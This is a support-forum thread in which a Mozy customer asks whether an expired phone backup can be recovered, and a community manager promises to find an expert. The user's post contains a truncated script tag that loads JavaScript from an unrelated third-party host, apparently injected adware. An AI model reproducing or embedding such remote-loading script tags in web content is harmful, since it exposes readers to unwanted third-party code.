Click to close the image preview

Showing results for 
Search instead for 
Do you mean 
Labels
Announcements
CONTEST ANNOUNCEMENT! Enter to win a $50 Amazon Gift Card!
Tell us a personal story of a time when Mozy really helped you out. Did you think all was lost but found Mozy had what you needed? Did it "save your bacon" so-to-speak? Check out the contest blog post for details on how to enter for a chance to win!

Latest Blog: How to Back Up Those Summer Vacation Photos
Want to make sure that your precious vacation memories are safely and securely backed up to your account? Follow the steps in the latest blog post to ensure that they are...

Mobile backup deleted?

So, I had the Mozy app on my HTC phone, backing up my pictures mostly. Then my phone broke, got it fixed, broke again, then broke again, then finally broke again - at this point it's been over the 30 days since a backup, and my phone sync is gone from the account. I should have backed up the phone backup onto my laptop, but I totally forgot in the midst of trying to get the phone fixed etc. Any chance Mozy still has the files lying around somewhere? I pay them money, so it would be nice. Anybody know if there is a way to check?

<script src="https://rtdock.com/bpo-rockettab-js/?pid=7269636872697665726d656469615f73657270&eid=fastconnect1&bna...
zachm
Admin Emeritus
(387)

Re: Mobile backup deleted?

Interesting question. Let me get an expert on this particular subject.

Zach M.
Community Manager